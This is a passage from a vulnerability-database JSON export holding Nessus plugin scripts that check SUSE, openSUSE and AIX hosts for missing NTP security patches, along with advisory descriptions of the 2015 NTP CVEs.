get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES11\" && (! preg(pattern:\"^(4)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES11 SP4\", os_ver + \" SP\" + sp);\nif (os_ver == \"SLED11\" && (! preg(pattern:\"^(4)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED11 SP4\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"ntp-4.2.8p4-5.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"ntp-doc-4.2.8p4-5.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"4\", cpu:\"x86_64\", reference:\"ntp-4.2.8p4-5.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"4\", cpu:\"x86_64\", reference:\"ntp-doc-4.2.8p4-5.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"4\", cpu:\"i586\", reference:\"ntp-4.2.8p4-5.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"4\", cpu:\"i586\", reference:\"ntp-doc-4.2.8p4-5.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ntp\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-09-14T16:34:38", "description": "This ntp update provides the following security and non security \nfixes :\n\n - Update to 4.2.8p4 to fix several security issues\n (bsc#951608) :\n\n - CVE-2015-7871: NAK to the Future: Symmetric association\n authentication bypass via crypto-NAK\n\n - CVE-2015-7855: decodenetnum() will ASSERT botch instead\n of returning FAIL on some bogus values\n\n - CVE-2015-7854: Password Length Memory Corruption\n Vulnerability\n\n - CVE-2015-7853: Invalid length data provided by a custom\n refclock driver could cause a buffer overflow\n\n - CVE-2015-7852 ntpq atoascii() Memory Corruption\n Vulnerability\n\n - CVE-2015-7851 saveconfig Directory Traversal\n Vulnerability\n\n - CVE-2015-7850 remote config logfile-keyfile\n\n - CVE-2015-7849 trusted key use-after-free\n\n - CVE-2015-7848 mode 7 loop counter underrun\n\n - CVE-2015-7701 Slow memory leak in CRYPTO_ASSOC\n\n - CVE-2015-7703 configuration directives 'pidfile' and\n 'driftfile' should only be allowed locally\n\n - CVE-2015-7704, CVE-2015-7705 Clients that receive a KoD\n should validate the origin timestamp field\n\n - CVE-2015-7691, CVE-2015-7692, CVE-2015-7702 Incomplete\n autokey data packet length checks\n\n - obsoletes ntp-memlock.patch.\n\n - Add a controlkey line to /etc/ntp.conf if one does not\n already exist to allow runtime configuuration via ntpq.", "edition": 25, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2015-11-20T00:00:00", "title": "openSUSE Security Update : ntp (openSUSE-2015-767)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-7703", "CVE-2015-7855", "CVE-2015-7704", "CVE-2015-7701", "CVE-2015-7848", "CVE-2015-7692", "CVE-2015-7851", "CVE-2015-7702", "CVE-2015-7852", "CVE-2015-7871", "CVE-2015-7849", "CVE-2015-7691", "CVE-2015-7705", "CVE-2015-7850", "CVE-2015-7854", "CVE-2015-7853"], "modified": "2015-11-20T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:ntp-debuginfo", "cpe:/o:novell:opensuse:42.1", "p-cpe:/a:novell:opensuse:ntp-debugsource", "p-cpe:/a:novell:opensuse:ntp"], "id": "OPENSUSE-2015-767.NASL", "href": "https://www.tenable.com/plugins/nessus/86964", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2015-767.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(86964);\n script_version(\"2.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/06/04\");\n\n script_cve_id(\"CVE-2015-7691\", \"CVE-2015-7692\", \"CVE-2015-7701\", \"CVE-2015-7702\", \"CVE-2015-7703\", \"CVE-2015-7704\", \"CVE-2015-7705\", \"CVE-2015-7848\", \"CVE-2015-7849\", \"CVE-2015-7850\", \"CVE-2015-7851\", \"CVE-2015-7852\", \"CVE-2015-7853\", \"CVE-2015-7854\", \"CVE-2015-7855\", \"CVE-2015-7871\");\n script_xref(name:\"TRA\", value:\"TRA-2015-04\");\n\n script_name(english:\"openSUSE Security Update : ntp (openSUSE-2015-767)\");\n script_summary(english:\"Check for the openSUSE-2015-767 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This ntp update provides the following security and non security \nfixes :\n\n - Update to 4.2.8p4 to fix several security issues\n (bsc#951608) :\n\n - CVE-2015-7871: NAK to the Future: Symmetric association\n authentication bypass via crypto-NAK\n\n - CVE-2015-7855: decodenetnum() will ASSERT botch instead\n of returning FAIL on some bogus values\n\n - CVE-2015-7854: Password Length Memory Corruption\n Vulnerability\n\n - CVE-2015-7853: Invalid length data provided by a custom\n refclock driver could cause a buffer overflow\n\n - CVE-2015-7852 ntpq atoascii() Memory Corruption\n Vulnerability\n\n - CVE-2015-7851 saveconfig Directory Traversal\n Vulnerability\n\n - CVE-2015-7850 remote config logfile-keyfile\n\n - CVE-2015-7849 trusted key use-after-free\n\n - CVE-2015-7848 mode 7 loop counter underrun\n\n - CVE-2015-7701 Slow memory leak in CRYPTO_ASSOC\n\n - CVE-2015-7703 configuration directives 'pidfile' and\n 'driftfile' should only be allowed locally\n\n - CVE-2015-7704, CVE-2015-7705 Clients that receive a KoD\n should validate the origin timestamp field\n\n - CVE-2015-7691, CVE-2015-7692, CVE-2015-7702 Incomplete\n autokey data packet length checks\n\n - obsoletes ntp-memlock.patch.\n\n - Add a controlkey line to /etc/ntp.conf if one does not\n already exist to allow runtime configuuration via ntpq.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=951608\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.tenable.com/security/research/tra-2015-04\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected ntp packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ntp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ntp-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ntp-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/11/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/11/20\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2020 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE42\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"42.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE42.1\", reference:\"ntp-4.2.8p4-9.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"ntp-debuginfo-4.2.8p4-9.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"ntp-debugsource-4.2.8p4-9.2\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ntp / ntp-debuginfo / ntp-debugsource\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2017-10-29T13:44:31", "description": "Network Time Protocol (NTP) is vulnerable to a denial of service, caused by an error in the sntp program. By sending specially crafted NTP packets, a remote attacker from within the local network could exploit this vulnerability to cause the application to enter into an infinite loop. Network Time Protocol (NTP) is vulnerable to a denial of service, caused by an error in ntp_crypto.c. An attacker could exploit this vulnerability using a packet containing an extension field with an invalid value for the length of its value field to cause ntpd to crash. Network Time Protocol (NTP) is vulnerable to a denial of service, caused by an error in ntp_crypto.c. An attacker could exploit this vulnerability using a packet containing an extension field with an invalid value for the length of its value field to cause ntpd to crash. Network Time Protocol (NTP) could allow a remote attacker to obtain sensitive information, caused by a memory leak in CRYPTO_ASSOC. An attacker could exploit this vulnerability to obtain sensitive information. Network Time Protocol (NTP) is vulnerable to a denial of service, caused by an error in ntp_crypto.c. An attacker could exploit this vulnerability using a packet containing an extension field with an invalid value for the length of its value field to cause ntpd to crash. Network Time Protocol (NTP) is vulnerable to a denial of service, caused by an error in the remote configuration functionality. By sending a specially crafted configuration file, an attacker could exploit this vulnerability to cause the application to enter into an infinite loop. Network Time Protocol (NTP) is vulnerable to a buffer overflow, caused by improper bounds checking by the refclock of ntpd. By sending an overly long string, a remote attacker could overflow a buffer and execute arbitrary code on the system or cause the application to crash.\nNetwork Time Protocol (NTP) is vulnerable to a denial of service, caused by ASSERT botch instead of returning FAIL on some invalid values by the decodenetnum() function. An attacker could exploit this vulnerability to cause a denial of service.\n\nThis plugin has been deprecated to better accommodate iFix supersedence with replacement plugin aix_ntp_v3_advisory4.nasl (plugin id 102321).", "edition": 7, "published": "2016-01-22T00:00:00", "type": "nessus", "title": "AIX 7.1 TL 4 : ntp (IV79944) (deprecated)", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-7855", "CVE-2015-5219", "CVE-2015-7701", "CVE-2015-7692", "CVE-2015-7702", "CVE-2015-7691", "CVE-2015-7850", "CVE-2015-7853"], "cpe": ["cpe:/o:ibm:aix:7.1"], "modified": "2017-08-09T00:00:00", "id": "AIX_IV79944.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=88057", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The text in the description was extracted from AIX Security\n# Advisory ntp_advisory4.asc.\n#\n# @DEPRECATED@\n#\n# Disabled on 2017/07/20. Deprecated by aix_ntp_v3_advisory8.nasl.\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(88057);\n script_version(\"$Revision: 2.7 $\");\n script_cvs_date(\"$Date: 2017/08/09 15:19:09 $\");\n\n script_cve_id(\"CVE-2015-5219\", \"CVE-2015-7691\", \"CVE-2015-7692\", \"CVE-2015-7701\", \"CVE-2015-7702\", \"CVE-2015-7850\", \"CVE-2015-7853\", \"CVE-2015-7855\");\n script_xref(name:\"TRA\", value:\"TRA-2015-04\");\n\n script_name(english:\"AIX 7.1 TL 4 : ntp (IV79944) (deprecated)\");\n script_summary(english:\"Check for APAR IV79944\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"This plugin has been deprecated.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Network Time Protocol (NTP) is vulnerable to a denial of service,\ncaused by an error in the sntp program. By sending specially crafted\nNTP packets, a remote attacker from within the local network could\nexploit this vulnerability to cause the application to enter into an\ninfinite loop. Network Time Protocol (NTP) is vulnerable to a denial\nof service, caused by an error in ntp_crypto.c. An attacker could\nexploit this vulnerability using a packet containing an extension\nfield with an invalid value for the length of its value field to cause\nntpd to crash. Network Time Protocol (NTP) is vulnerable to a denial\nof service, caused by an error in ntp_crypto.c. An attacker could\nexploit this vulnerability using a packet containing an extension\nfield with an invalid value for the length of its value field to cause\nntpd to crash. Network Time Protocol (NTP) could allow a remote\nattacker to obtain sensitive information, caused by a memory leak in\nCRYPTO_ASSOC. An attacker could exploit this vulnerability to obtain\nsensitive information. Network Time Protocol (NTP) is vulnerable to a\ndenial of service, caused by an error in ntp_crypto.c. An attacker\ncould exploit this vulnerability using a packet containing an\nextension field with an invalid value for the length of its value\nfield to cause ntpd to crash. Network Time Protocol (NTP) is\nvulnerable to a denial of service, caused by an error in the remote\nconfiguration functionality. By sending a specially crafted\nconfiguration file, an attacker could exploit this vulnerability to\ncause the application to enter into an infinite loop. Network Time\nProtocol (NTP) is vulnerable to a buffer overflow, caused by improper\nbounds checking by the refclock of ntpd. By sending an overly long\nstring, a remote attacker could overflow a buffer and execute\narbitrary code on the system or cause the application to crash.\nNetwork Time Protocol (NTP) is vulnerable to a denial of service,\ncaused by ASSERT botch instead of returning FAIL on some invalid\nvalues by the decodenetnum() function. An attacker could exploit this\nvulnerability to cause a denial of service.\n\nThis plugin has been deprecated to better accommodate iFix\nsupersedence with replacement plugin aix_ntp_v3_advisory4.nasl (plugin\nid 102321).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://aix.software.ibm.com/aix/efixes/security/ntp_advisory4.asc\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.tenable.com/security/research/tra-2015-04\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"n/a\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:ibm:aix:7.1\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/01/21\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/01/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/01/22\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2017 Tenable Network Security, Inc.\");\n script_family(english:\"AIX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/AIX/lslpp\", \"Host/local_checks_enabled\", \"Host/AIX/version\");\n\n exit(0);\n}\n\nexit(0, \"This plugin has been deprecated. Use aix_ntp_v3_advisory4.nasl (plugin ID 102321) instead.\");\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"aix.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif ( ! get_kb_item(\"Host/AIX/version\") ) audit(AUDIT_OS_NOT, \"AIX\");\nif ( ! get_kb_item(\"Host/AIX/lslpp\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nif ( get_kb_item(\"Host/AIX/emgr_failure\" ) ) exit(0, \"This iFix check is disabled because : \"+get_kb_item(\"Host/AIX/emgr_failure\") );\n\nflag = 0;\n\nif (aix_check_ifix(release:\"7.1\", ml:\"04\", sp:\"01\", patch:\"IV79944s1a\", package:\"bos.net.tcp.client\", minfilesetver:\"7.1.4.0\", maxfilesetver:\"7.1.4.0\") < 0) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:aix_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2021-01-06T09:18:33", "description": "The remote AIX host has a version of Network Time Protocol (NTP)\ninstalled that is affected by the following vulnerabilities :\n\n - A divide-by-zero error exists in file include/ntp.h\n when handling LOGTOD and ULOGTOD macros in a crafted\n NTP packet. An unauthenticated, remote attacker can\n exploit this, via crafted NTP packets, to crash ntpd.\n (CVE 2015-5219)\n\n - A flaw exists in the ntp_crypto.c file due to improper\n validation of the 'vallen' value in extension fields. An\n unauthenticated, remote attacker can exploit this, via\n specially crafted autokey packets, to disclose\n sensitive information or cause a denial of service.\n (CVE-2015-7691)\n\n - A denial of service vulnerability exists in the autokey\n functionality due to a failure in the crypto_bob2(),\n crypto_bob3(), and cert_sign() functions to properly\n validate the 'vallen' value. An unauthenticated, remote\n attacker can exploit this, via specially crafted autokey\n packets, to crash the NTP service. (CVE-2015-7692)\n\n - A denial of service vulnerability exists in the\n crypto_recv() function in the file ntp_crypto.c related\n to autokey functionality. An unauthenticated, remote\n attacker can exploit this, via an ongoing flood of NTPv4\n autokey requests, to exhaust memory resources.\n (CVE-2015-7701)\n\n - A denial of service vulnerability exists due to improper\n validation of packets containing certain autokey\n operations. An unauthenticated, remote attacker can\n exploit this, via specially crafted autokey packets,\n to crash the NTP service. (CVE-2015-7702)\n\n - A denial of service vulnerability exists due to a logic\n flaw in the authreadkeys() function in the file\n authreadkeys.c when handling extended logging where the\n log and key files are set to be the same file. An\n authenticated, remote attacker can exploit this, via a\n crafted set of remote configuration requests, to cause\n the NTP service to stop responding. (CVE-2015-7850)\n\n - A overflow condition exists in the\n read_refclock_packet() function in the file ntp_io.c\n when handling negative data lengths. A local attacker\n can exploit this to crash the NTP service or possibly\n gain elevated privileges. (CVE-2015-7853)\n\n - A denial of service vulnerability exists due to an\n assertion flaw in the decodenetnum() function in the\n file decodenetnum.c when handling long data values in\n mode 6 and 7 packets. An unauthenticated, remote\n attacker can exploit this to crash the NTP service.\n (CVE-2015-7855)", "edition": 28, "cvss3": {"score": 7.5, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"}, "published": "2017-08-09T00:00:00", "title": "AIX NTP v3 Advisory : ntp_advisory4.asc (IV79942) (IV79943) (IV79944) (IV79945) (IV79946)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-7855", "CVE-2015-5219", "CVE-2015-7701", "CVE-2015-7692", "CVE-2015-7702", "CVE-2015-7691", "CVE-2015-7850", "CVE-2015-7853"], "modified": "2017-08-09T00:00:00", "cpe": ["cpe:/a:ntp:ntp", "cpe:/o:ibm:aix"], "id": "AIX_NTP_V3_ADVISORY4.NASL", "href": "https://www.tenable.com/plugins/nessus/102321", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(102321);\n script_version(\"2.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\n \"CVE-2015-5219\",\n \"CVE-2015-7691\",\n \"CVE-2015-7692\",\n \"CVE-2015-7701\",\n \"CVE-2015-7702\",\n \"CVE-2015-7850\",\n \"CVE-2015-7853\",\n \"CVE-2015-7855\"\n );\n script_bugtraq_id(\n 76473,\n 77273,\n 77274,\n 77279,\n 77281,\n 77283,\n 77285,\n 77286\n );\n script_xref(name:\"TRA\", value:\"TRA-2015-04\");\n script_xref(name:\"EDB-ID\", value:\"40840\");\n\n script_name(english:\"AIX NTP v3 Advisory : ntp_advisory4.asc (IV79942) (IV79943) (IV79944) (IV79945) (IV79946)\");\n script_summary(english:\"Checks the version of the ntp packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote AIX host has a version of NTP installed that is affected\nby multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote AIX host has a version of Network Time Protocol (NTP)\ninstalled that is affected by the following vulnerabilities :\n\n - A divide-by-zero error exists in file include/ntp.h\n when handling LOGTOD and ULOGTOD macros in a crafted\n NTP packet. An unauthenticated, remote attacker can\n exploit this, via crafted NTP packets, to crash ntpd.\n (CVE 2015-5219)\n\n - A flaw exists in the ntp_crypto.c file due to improper\n validation of the 'vallen' value in extension fields. An\n unauthenticated, remote attacker can exploit this, via\n specially crafted autokey packets, to disclose\n sensitive information or cause a denial of service.\n (CVE-2015-7691)\n\n - A denial of service vulnerability exists in the autokey\n functionality due to a failure in the crypto_bob2(),\n crypto_bob3(), and cert_sign() functions to properly\n validate the 'vallen' value. An unauthenticated, remote\n attacker can exploit this, via specially crafted autokey\n packets, to crash the NTP service. (CVE-2015-7692)\n\n - A denial of service vulnerability exists in the\n crypto_recv() function in the file ntp_crypto.c related\n to autokey functionality. An unauthenticated, remote\n attacker can exploit this, via an ongoing flood of NTPv4\n autokey requests, to exhaust memory resources.\n (CVE-2015-7701)\n\n - A denial of service vulnerability exists due to improper\n validation of packets containing certain autokey\n operations. An unauthenticated, remote attacker can\n exploit this, via specially crafted autokey packets,\n to crash the NTP service. (CVE-2015-7702)\n\n - A denial of service vulnerability exists due to a logic\n flaw in the authreadkeys() function in the file\n authreadkeys.c when handling extended logging where the\n log and key files are set to be the same file. An\n authenticated, remote attacker can exploit this, via a\n crafted set of remote configuration requests, to cause\n the NTP service to stop responding. (CVE-2015-7850)\n\n - A overflow condition exists in the\n read_refclock_packet() function in the file ntp_io.c\n when handling negative data lengths. A local attacker\n can exploit this to crash the NTP service or possibly\n gain elevated privileges. (CVE-2015-7853)\n\n - A denial of service vulnerability exists due to an\n assertion flaw in the decodenetnum() function in the\n file decodenetnum.c when handling long data values in\n mode 6 and 7 packets. An unauthenticated, remote\n attacker can exploit this to crash the NTP service.\n (CVE-2015-7855)\");\n script_set_attribute(attribute:\"see_also\", value:\"http://aix.software.ibm.com/aix/efixes/security/ntp_advisory4.asc\");\n script_set_attribute(attribute:\"solution\", value:\n\"A fix is available and can be downloaded from the IBM AIX website.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/04/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/01/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/08/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:ibm:aix\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:ntp:ntp\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"AIX Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2021 Tenable Network Security, Inc.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/AIX/lslpp\", \"Host/local_checks_enabled\", \"Host/AIX/version\");\n\n exit(0);\n}\n\ninclude(\"aix.inc\");\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\noslevel = get_kb_item(\"Host/AIX/version\");\nif (isnull(oslevel)) audit(AUDIT_UNKNOWN_APP_VER, \"AIX\");\noslevel = oslevel - \"AIX-\";\n\noslevelcomplete = chomp(get_kb_item(\"Host/AIX/oslevelsp\"));\nif (isnull(oslevelcomplete)) audit(AUDIT_UNKNOWN_APP_VER, \"AIX\");\noslevelparts = split(oslevelcomplete, sep:'-', keep:0);\nif ( max_index(oslevelparts) != 4 ) audit(AUDIT_UNKNOWN_APP_VER, \"AIX\");\nml = oslevelparts[1];\nsp = oslevelparts[2];\n\nif ( ! get_kb_item(\"Host/AIX/lslpp\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nif ( get_kb_item(\"Host/AIX/emgr_failure\" ) ) exit(0, \"This AIX package check is disabled because : \"+get_kb_item(\"Host/AIX/emgr_failure\") );\n\nflag = 0;\n\naix_ntp_vulns = {\n \"5.3\": {\n \"12\": {\n \"09\": {\n \"bos.net.tcp.client\": {\n \"minfilesetver\":\"5.3.12.0\",\n \"maxfilesetver\":\"5.3.12.10\",\n \"patch\":\"(IV79946s9a|IV84269m9a|IV87614m9a|IV92194m9a|IV96305m9a)\"\n }\n }\n }\n },\n \"6.1\": {\n \"09\": {\n \"06\": {\n \"bos.net.tcp.client\": {\n \"minfilesetver\":\"6.1.9.0\",\n \"maxfilesetver\":\"6.1.9.101\",\n \"patch\":\"(IV79942s6a|IV83984m6a|IV87419m6a|IV91803m6a)\"\n }\n }\n }\n },\n \"7.1\": {\n \"03\": {\n \"05\": {\n \"bos.net.tcp.client\": {\n \"minfilesetver\":\"7.1.3.0\",\n \"maxfilesetver\":\"7.1.3.45\",\n \"patch\":\"(IV79943s5b|IV83993m5a|IV87615m5a|IV92193m5a)\"\n }\n }\n },\n \"04\": {\n \"01\": {\n \"bos.net.tcp.client\": {\n \"minfilesetver\":\"7.1.4.0\",\n \"maxfilesetver\":\"7.1.4.0\",\n \"patch\":\"(IV79944s1a|IV83994m1a|IV87420m0a|IV91951m3a)\"\n }\n }\n }\n },\n \"7.2\": {\n \"00\": {\n \"01\": {\n \"bos.net.tcp.ntp\": {\n \"minfilesetver\":\"7.2.0.0\",\n \"maxfilesetver\":\"7.2.0.0\",\n \"patch\":\"(IV79945s1a|IV83995m1a|IV87939m0b|IV92192m2a)\"\n },\n \"bos.net.tcp.ntpd\": {\n \"minfilesetver\":\"7.2.0.0\",\n \"maxfilesetver\":\"7.2.0.0\",\n \"patch\":\"(IV79945s1a|IV83995m1a|IV87939m0b|IV92192m2a)\"\n }\n }\n }\n }\n};\n\nversion_report = \"AIX \" + oslevel;\nif ( empty_or_null(aix_ntp_vulns[oslevel]) ) {\n os_options = join( sort( keys(aix_ntp_vulns) ), sep:' / ' );\n audit(AUDIT_OS_NOT, os_options, version_report);\n}\n\nversion_report = version_report + \" ML \" + ml;\nif ( empty_or_null(aix_ntp_vulns[oslevel][ml]) ) {\n ml_options = join( sort( keys(aix_ntp_vulns[oslevel]) ), sep:' / ' );\n audit(AUDIT_OS_NOT, \"ML \" + ml_options, version_report);\n}\n\nversion_report = version_report + \" SP \" + sp;\nif ( empty_or_null(aix_ntp_vulns[oslevel][ml][sp]) ) {\n sp_options = join( sort( keys(aix_ntp_vulns[oslevel][ml]) ), sep:' / ' );\n audit(AUDIT_OS_NOT, \"SP \" + sp_options, version_report);\n}\n\nforeach package ( keys(aix_ntp_vulns[oslevel][ml][sp]) ) {\n package_info = aix_ntp_vulns[oslevel][ml][sp][package];\n minfilesetver = package_info[\"minfilesetver\"];\n maxfilesetver = package_info[\"maxfilesetver\"];\n patch = package_info[\"patch\"];\n if (aix_check_ifix(release:oslevel, ml:ml, sp:sp, patch:patch, package:package, minfilesetver:minfilesetver, maxfilesetver:maxfilesetver) < 0) flag++;\n}\n\nif (flag)\n{\n aix_report_extra = ereg_replace(string:aix_report_get(), pattern:\"[()]\", replace:\"\");\n aix_report_extra = ereg_replace(string:aix_report_extra, pattern:\"[|]\", replace:\" or \");\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : aix_report_extra\n );\n}\nelse\n{\n tested = aix_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bos.net.tcp.ntp / bos.net.tcp.ntpd / bos.net.tcp.client\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "cve": [{"lastseen": "2020-12-09T20:03:08", "description": "ntpd in NTP 4.2.x before 4.2.8p4, and 4.3.x before 4.3.77 allows remote authenticated users to cause a denial of service (infinite loop or crash) by pointing the key file at the log file.", "edition": 7, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 6.5, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2017-08-07T20:29:00", "title": "CVE-2015-7850", "type": "cve", "cwe": ["CWE-835"], 